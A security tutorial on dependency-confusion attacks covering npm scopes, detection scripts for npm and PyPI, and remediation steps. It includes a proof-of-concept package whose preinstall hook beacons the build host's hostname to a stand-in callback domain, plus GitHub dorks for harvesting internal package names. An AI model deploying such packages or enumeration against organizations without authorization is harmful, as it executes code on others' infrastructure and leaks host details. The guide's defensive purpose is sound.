Dependency Confusion: Internal Package Squatting, Scoped Packages, and Detection
Dependency confusion is a supply-chain attack that exploits how package managers resolve names across multiple sources. When an organization references an internally-named package — one that lives only in a private registry — but the build pipeline is also configured to fall back to a public registry, an attacker can publish a malicious package of the same name to the public index. If the public version carries a higher version number, the resolver often prefers it, silently pulling attacker-controlled code into a trusted build. Alex Birsan's 2021 research demonstrated this against dozens of major companies, earning six-figure bug bounties and proving that the flaw is a misconfiguration in resolution logic rather than a bug in any single tool.
For pentesters, dependency confusion sits at the intersection of OSINT and code execution: the hard part is discovering the internal package names, and the proof-of-concept is usually a harmless DNS or HTTP callback fired at install time. This guide covers internal package squatting, the subtleties of scoped packages, detection across npm, PyPI, and Maven ecosystems, and the controls that actually close the gap. Everything here assumes explicit written authorization — publishing packages or triggering callbacks against an organization you do not have scope for is illegal, and even a benign PoC executes code on someone else's infrastructure.
How Resolution Confusion Happens
Package managers were designed to merge multiple sources into one logical namespace. That convenience is the root cause. Consider an npm project whose .npmrc points at a private registry but does not pin every dependency to it:
# .npmrc — misconfigured: no scope binding, public fallback intact
registry=https://registry.npmjs.org/
//npm.internal.corp/:_authToken=${TOKEN}
If package.json lists "corp-auth-utils": "^1.2.0" and that name exists only on the internal registry, npm still queries the public registry too. Publish [email protected] publicly and the semver resolver picks the highest match — the attacker's. The same pattern appears in pip when a private index is added with --extra-index-url (which merges indexes and picks the highest version across all of them) rather than --index-url, and in Maven/Gradle when an internal groupId can also be claimed on Maven Central or a misconfigured proxy.
The three preconditions are constant: (1) an internal package name that is not registered on the public index, (2) a build that resolves against the public index as a fallback, and (3) a version-precedence rule that favors the highest semver. Break any one and the attack fails.
Internal Package Squatting
Squatting is the act of registering an unclaimed internal name on a public registry before the defender does. Attackers harvest candidate names from anything an organization leaks publicly:
- Frontend bundles — webpack output frequently embeds the original module paths and
require()names of internal packages in comments and source maps. - Leaked manifests — a
package.json,package-lock.json,requirements.txt,pom.xml, oryarn.lockcommitted to a public repo lists exact internal dependency names. - Public CI logs — Travis, CircleCI, and GitHub Actions logs print resolution errors like
404 Not Found - @acme/billing-sdkthat reveal both name and scope. - Docker images — published images on Docker Hub often retain a full
node_modulestree or apip freezeoutput.
GitHub code search is the highest-yield source. You can build the right queries with the Search Dork Generator to surface manifests that reference an internal scope:
# GitHub dorks to enumerate internal package names (authorized scope only)
org:acme-corp filename:package.json "@acme/"
org:acme-corp filename:requirements.txt "acme-"
"registry.npm.acme.internal" filename:.npmrc
org:acme-corp filename:pom.xml "<groupId>com.acme"
Once you have a candidate, confirm it is genuinely unclaimed on the public index before reporting. A clean 404 means the name is squattable; a 200 means someone — defender or attacker — already holds it. The curl Command Builder helps you craft the registry probe with the right headers:
# Does the name exist publicly? 404 = squattable, 200 = taken
curl -s -o /dev/null -w "%{http_code}\n" https://registry.npmjs.org/corp-auth-utils
curl -s -o /dev/null -w "%{http_code}\n" https://pypi.org/pypi/acme-internal-client/json
Scoped Packages: The Critical Nuance
Scoped npm packages (@scope/name) are the single most important defensive primitive, and the most misunderstood. A scope like @acme can be reserved on npmjs.org by the organization. Once reserved, no one else can publish under that scope on the public registry — the resolution-confusion door is closed for every package in it, because the public registry will reject an attacker's publish attempt outright.
The trap is partial adoption. Teams that reserve @acme but still ship a handful of legacy unscoped internal packages (acme-logger, internal-config) remain fully exposed on exactly those names. Worse, some teams assume that merely using a scope in package.json provides protection; it does not unless the scope is reserved on the public registry and the resolver is told that scope maps only to the private registry:
# .npmrc — correct scope binding: @acme NEVER hits the public registry
@acme:registry=https://npm.internal.corp/
//npm.internal.corp/:_authToken=${TOKEN}
registry=https://registry.npmjs.org/
With that binding, npm install @acme/anything resolves only against the internal registry. The public registry is never consulted for the @acme scope, so even an unreserved scope name cannot be confused — provided the scope binding is present in every project and CI environment. As a pentester, the finding is twofold: unscoped internal names that resolve publicly, and scoped names whose scope is neither reserved nor bound.
Building a Safe Proof-of-Concept
A responsible PoC proves code execution at install time without exfiltrating data or persisting. npm runs lifecycle scripts during install; a single out-of-band callback is enough to demonstrate the issue. Keep it benign and uniquely tagged:
{
"name": "corp-auth-utils",
"version": "99.0.0",
"description": "Authorized dependency-confusion PoC. Contact: [email protected]",
"scripts": {
"preinstall": "node poc.js"
}
}
// poc.js — non-destructive beacon: hostname only, no env dump, no persistence
const os = require('os');
const https = require('https');
const id = `${os.hostname()}.poc-CONFUSION-1234.collab.example`;
https.get(`https://${id}/`, () => {}).on('error', () => {});
The DNS/HTTP callback fires from inside the victim's build network, which is the proof. Do not harvest environment variables, process.env, build secrets, or AWS metadata — that crosses from demonstration into data theft and exceeds almost every authorization. Set a low version that is still higher than the internal one rather than 99.0.0 if you want to minimize blast radius, and unpublish immediately after the report is acknowledged. Equivalent hooks exist elsewhere: PyPI's setup.py executes during pip install from sdist, and Maven can trigger code via plugin execution in the build lifecycle.
Detection Across Ecosystems
Detection is about comparing the set of required names against the set of publicly claimed names and flagging the gap. A simple, scriptable approach: extract every dependency from the lockfile, then probe each name on the corresponding public index.
# npm: list direct + transitive deps, then check public registry
jq -r '.dependencies | keys[]' package-lock.json | while read pkg; do
code=$(curl -s -o /dev/null -w "%{http_code}" "https://registry.npmjs.org/$pkg")
[ "$code" = "404" ] && echo "SQUATTABLE: $pkg"
done
# Python: any requirement not on PyPI is a confusion candidate
while read pkg; do
name=$(echo "$pkg" | sed 's/[=<>~!].*//')
code=$(curl -s -o /dev/null -w "%{http_code}" "https://pypi.org/pypi/$name/json")
[ "$code" = "404" ] && echo "SQUATTABLE: $name"
done < requirements.txt
Names that 404 publicly but are clearly internal dependencies are your hits. While reviewing leaked manifests and source, also run a credentials pass — internal .npmrc and CI configs frequently leak registry auth tokens, and the Secret Scanner will catch hardcoded npm tokens, PyPI credentials, and cloud keys in the same files. Maven requires checking each groupId/artifactId against Central and any configured proxies, since a permissive proxy that mirrors Central can reintroduce confusion even when the names exist privately.
Remediation and Defenses
Closing dependency confusion is a configuration problem with clear, durable fixes. Prioritize in this order:
- Reserve your scope/namespace publicly. Register the
@orgnpm scope on npmjs.org and claim internal names on PyPI so attackers cannot publish them. This is the single highest-leverage control. - Bind scopes to the private registry. Use
@scope:registry=in every.npmrcso scoped packages never consult the public index. Distribute the config via CI base images, not per-developer machines. - Avoid merged indexes. In pip, prefer a single curated
--index-url(an internal proxy that explicitly mirrors approved public packages) over--extra-index-url, which merges sources and picks the highest version anywhere. - Use a controlling proxy. Artifactory, Nexus, or Verdaccio configured to not automatically fall through to the public registry for known-internal names. Enable namespace/scope blocking so internal names are never sourced upstream.
- Pin and verify. Commit lockfiles, enable integrity hashes (npm's
integrity, pip hash-checking mode), and require signature or provenance verification where supported. - Disable install scripts in CI. Run
npm ci --ignore-scriptswhere feasible to remove the most direct code-execution path during builds.
Dependency confusion endures because the fix lives in build configuration that nobody owns by default, and because partial mitigations create a false sense of safety. A reserved-but-unbound scope, a single legacy unscoped package, or one CI job using --extra-index-url is enough to reopen the hole. For pentesters, that means the highest-value deliverable is rarely the PoC callback itself — it is the precise inventory of which internal names resolve publicly and which scopes are unreserved, mapped against authorized scope so the defender can close every gap in one pass.
Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides